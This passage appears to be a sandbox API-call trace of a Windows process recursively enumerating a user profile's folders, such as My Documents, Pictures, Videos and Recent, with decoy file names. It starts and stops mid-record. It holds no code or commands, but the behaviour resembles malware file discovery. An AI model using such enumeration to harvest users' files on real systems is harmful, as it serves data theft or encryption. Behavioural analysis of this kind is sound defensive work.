lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x477383c0, ftCreationTime.dwHighDateTime=0x1d5db35, ftLastAccessTime.dwLowDateTime=0x53ddb350, ftLastAccessTime.dwHighDateTime=0x1d5dc8f, ftLastWriteTime.dwLowDateTime=0x53ddb350, ftLastWriteTime.dwHighDateTime=0x1d5dc8f, nFileSizeHigh=0x0, nFileSizeLow=0xaf21, dwReserved0=0xa0000003, dwReserved1=0xa0038c26, cFileName="vDf-RB4rZpp_m.m4a", cAlternateFileName="VDF-RB~1.M4A")) returned 1 [0071.923] FindClose (in: hFindFile=0x71aba0 | out: hFindFile=0x71aba0) returned 1 [0071.923] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.923] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0071.923] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x721510, ftCreationTime.dwLowDateTime=0x7222a8, ftCreationTime.dwHighDateTime=0x1d5e2ac, ftLastAccessTime.dwLowDateTime=0x6c99c230, ftLastAccessTime.dwHighDateTime=0x1d5e3a6, ftLastWriteTime.dwLowDateTime=0x6c99c230, ftLastWriteTime.dwHighDateTime=0x1d5e3a6, nFileSizeHigh=0x0, nFileSizeLow=0x12ac6, dwReserved0=0xa0000003, dwReserved1=0xa0038c26, cFileName="_Vjb3DQdgJDvz-HRhS.wav", cAlternateFileName="_VJB3D~1.WAV")) returned 0xffffffff [0071.924] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.924] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0071.924] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x721510, ftCreationTime.dwLowDateTime=0x7222a8, ftCreationTime.dwHighDateTime=0x1d5e2ac, ftLastAccessTime.dwLowDateTime=0x6c99c230, ftLastAccessTime.dwHighDateTime=0x1d5e3a6, ftLastWriteTime.dwLowDateTime=0x6c99c230, ftLastWriteTime.dwHighDateTime=0x1d5e3a6, nFileSizeHigh=0x0, nFileSizeLow=0x12ac6, dwReserved0=0xa0000003, dwReserved1=0xa0038c26, cFileName="_Vjb3DQdgJDvz-HRhS.wav", cAlternateFileName="_VJB3D~1.WAV")) returned 0xffffffff [0071.924] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.924] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0071.924] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9223da0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9223da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName=".", cAlternateFileName="")) returned 0x71ef90 [0071.924] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9223da0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9223da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName="..", cAlternateFileName="")) returned 1 [0071.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\*", lpFindFileData=0x7173f0 | out: lpFindFileData=0x7173f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89575c50, ftCreationTime.dwHighDateTime=0x1d5dc3c, ftLastAccessTime.dwLowDateTime=0x489ad680, ftLastAccessTime.dwHighDateTime=0x1d5da55, ftLastWriteTime.dwLowDateTime=0x489ad680, ftLastWriteTime.dwHighDateTime=0x1d5da55, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660056, dwReserved1=0x34006d, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0071.925] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x7173f0 | out: lpFindFileData=0x7173f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89575c50, ftCreationTime.dwHighDateTime=0x1d5dc3c, ftLastAccessTime.dwLowDateTime=0x489ad680, ftLastAccessTime.dwHighDateTime=0x1d5da55, ftLastWriteTime.dwLowDateTime=0x489ad680, ftLastWriteTime.dwHighDateTime=0x1d5da55, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660056, dwReserved1=0x34006d, cFileName="..", cAlternateFileName="")) returned 1 [0071.926] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0071.926] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7173f0 | out: hHeap=0x6d0000) returned 1 [0071.926] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14bf79e0, ftCreationTime.dwHighDateTime=0x1d5e7fe, ftLastAccessTime.dwLowDateTime=0x50e05730, ftLastAccessTime.dwHighDateTime=0x1d5e184, ftLastWriteTime.dwLowDateTime=0x50e05730, ftLastWriteTime.dwHighDateTime=0x1d5e184, nFileSizeHigh=0x0, nFileSizeLow=0xf18b, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName="KTDqRNhC.gif", cAlternateFileName="")) returned 1 [0071.926] FindClose (in: hFindFile=0x71ef90 | out: hFindFile=0x71ef90) returned 1 [0071.926] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0071.926] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0071.926] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x717b00, ftCreationTime.dwLowDateTime=0x6f57c8, ftCreationTime.dwHighDateTime=0x1d5dc45, ftLastAccessTime.dwLowDateTime=0x29c86a70, ftLastAccessTime.dwHighDateTime=0x1d5e2a1, ftLastWriteTime.dwLowDateTime=0x29c86a70, ftLastWriteTime.dwHighDateTime=0x1d5e2a1, nFileSizeHigh=0x0, nFileSizeLow=0x3964, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName="y3n0o.bmp", cAlternateFileName="")) returned 0xffffffff [0071.926] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0071.926] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0071.926] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x717b00, ftCreationTime.dwLowDateTime=0x6f57c8, ftCreationTime.dwHighDateTime=0x1d5dc45, ftLastAccessTime.dwLowDateTime=0x29c86a70, ftLastAccessTime.dwHighDateTime=0x1d5e2a1, ftLastWriteTime.dwLowDateTime=0x29c86a70, ftLastWriteTime.dwHighDateTime=0x1d5e2a1, nFileSizeHigh=0x0, nFileSizeLow=0x3964, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName="y3n0o.bmp", cAlternateFileName="")) returned 0xffffffff [0071.926] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0071.926] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0071.926] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName=".", cAlternateFileName="")) returned 0x71ef90 [0071.927] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName="..", cAlternateFileName="")) returned 1 [0071.927] FindClose (in: hFindFile=0x71ef90 | out: hFindFile=0x71ef90) returned 1 [0071.927] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0071.927] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0071.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName=".", cAlternateFileName="")) returned 0x71ef90 [0071.927] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName="..", cAlternateFileName="")) returned 1 [0071.927] FindClose (in: hFindFile=0x71ef90 | out: hFindFile=0x71ef90) returned 1 [0071.928] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0071.928] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0071.928] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x717b00, ftCreationTime.dwLowDateTime=0x6f57c8, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0071.928] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0071.928] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0071.928] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x717b00, ftCreationTime.dwLowDateTime=0x6f57c8, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0071.928] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0071.928] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0071.928] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x717b00, ftCreationTime.dwLowDateTime=0x6f57c8, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0071.928] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0071.928] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd91656c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd91656c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0071.928] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd91656c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd91656c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName=".", cAlternateFileName="")) returned 0x71ef90 [0071.928] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd91656c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd91656c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName="..", cAlternateFileName="")) returned 1 [0071.929] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\*", lpFindFileData=0x7173f0 | out: lpFindFileData=0x7173f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbacc7970, ftCreationTime.dwHighDateTime=0x1d5e4af, ftLastAccessTime.dwLowDateTime=0xb52ca0e0, ftLastAccessTime.dwHighDateTime=0x1d5e521, ftLastWriteTime.dwLowDateTime=0xb52ca0e0, ftLastWriteTime.dwHighDateTime=0x1d5e521, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660056, dwReserved1=0x34006d, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0071.929] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x7173f0 | out: lpFindFileData=0x7173f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbacc7970, ftCreationTime.dwHighDateTime=0x1d5e4af, ftLastAccessTime.dwLowDateTime=0xb52ca0e0, ftLastAccessTime.dwHighDateTime=0x1d5e521, ftLastWriteTime.dwLowDateTime=0xb52ca0e0, ftLastWriteTime.dwHighDateTime=0x1d5e521, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660056, dwReserved1=0x34006d, cFileName="..", cAlternateFileName="")) returned 1 [0071.929] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\*", lpFindFileData=0x717b00 | out: lpFindFileData=0x717b00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b1e1960, ftCreationTime.dwHighDateTime=0x1d5d980, ftLastAccessTime.dwLowDateTime=0x96d31e70, ftLastAccessTime.dwHighDateTime=0x1d5e3e2, ftLastWriteTime.dwLowDateTime=0x96d31e70, ftLastWriteTime.dwHighDateTime=0x1d5e3e2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e577, dwReserved1=0x2294be60, cFileName=".", cAlternateFileName="")) returned 0x71f010 [0071.929] FindNextFileW (in: hFindFile=0x71f010, lpFindFileData=0x717b00 | out: lpFindFileData=0x717b00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b1e1960, ftCreationTime.dwHighDateTime=0x1d5d980, ftLastAccessTime.dwLowDateTime=0x96d31e70, ftLastAccessTime.dwHighDateTime=0x1d5e3e2, ftLastWriteTime.dwLowDateTime=0x96d31e70, ftLastWriteTime.dwHighDateTime=0x1d5e3e2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e577, dwReserved1=0x2294be60, cFileName="..", cAlternateFileName="")) returned 1 [0071.929] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\*", lpFindFileData=0x717d58 | out: lpFindFileData=0x717d58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x433712e0, ftCreationTime.dwHighDateTime=0x1d5d9d2, ftLastAccessTime.dwLowDateTime=0xbd924f50, ftLastAccessTime.dwHighDateTime=0x1d5e5a3, ftLastWriteTime.dwLowDateTime=0xbd924f50, ftLastWriteTime.dwHighDateTime=0x1d5e5a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x590051, dwReserved1=0x63004e, cFileName=".", cAlternateFileName="")) returned 0x71f050 [0071.930] FindNextFileW (in: hFindFile=0x71f050, lpFindFileData=0x717d58 | out: lpFindFileData=0x717d58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x433712e0, ftCreationTime.dwHighDateTime=0x1d5d9d2, ftLastAccessTime.dwLowDateTime=0xbd924f50, ftLastAccessTime.dwHighDateTime=0x1d5e5a3, ftLastWriteTime.dwLowDateTime=0xbd924f50, ftLastWriteTime.dwHighDateTime=0x1d5e5a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x590051, dwReserved1=0x63004e, cFileName="..", cAlternateFileName="")) returned 1 [0071.930] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\*", lpFindFileData=0x735198 | out: lpFindFileData=0x735198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cf49f0, ftCreationTime.dwHighDateTime=0x1d5e2a7, ftLastAccessTime.dwLowDateTime=0x35734070, ftLastAccessTime.dwHighDateTime=0x1d5d7ac, ftLastWriteTime.dwLowDateTime=0x35734070, ftLastWriteTime.dwHighDateTime=0x1d5d7ac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71f090 [0071.930] FindNextFileW (in: hFindFile=0x71f090, lpFindFileData=0x735198 | out: lpFindFileData=0x735198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cf49f0, ftCreationTime.dwHighDateTime=0x1d5e2a7, ftLastAccessTime.dwLowDateTime=0x35734070, ftLastAccessTime.dwHighDateTime=0x1d5d7ac, ftLastWriteTime.dwLowDateTime=0x35734070, ftLastWriteTime.dwHighDateTime=0x1d5d7ac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.930] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\*", lpFindFileData=0x736650 | out: lpFindFileData=0x736650*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0153b0, ftCreationTime.dwHighDateTime=0x1d5e0d8, ftLastAccessTime.dwLowDateTime=0xddf7fa00, ftLastAccessTime.dwHighDateTime=0x1d5daf0, ftLastWriteTime.dwLowDateTime=0xddf7fa00, ftLastWriteTime.dwHighDateTime=0x1d5daf0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71f0d0 [0071.930] FindNextFileW (in: hFindFile=0x71f0d0, lpFindFileData=0x736650 | out: lpFindFileData=0x736650*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0153b0, ftCreationTime.dwHighDateTime=0x1d5e0d8, ftLastAccessTime.dwLowDateTime=0xddf7fa00, ftLastAccessTime.dwHighDateTime=0x1d5daf0, ftLastWriteTime.dwLowDateTime=0xddf7fa00, ftLastWriteTime.dwHighDateTime=0x1d5daf0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.931] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\*", lpFindFileData=0x737b58 | out: lpFindFileData=0x737b58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x296dc130, ftCreationTime.dwHighDateTime=0x1d5d836, ftLastAccessTime.dwLowDateTime=0xf8dea030, ftLastAccessTime.dwHighDateTime=0x1d5dc58, 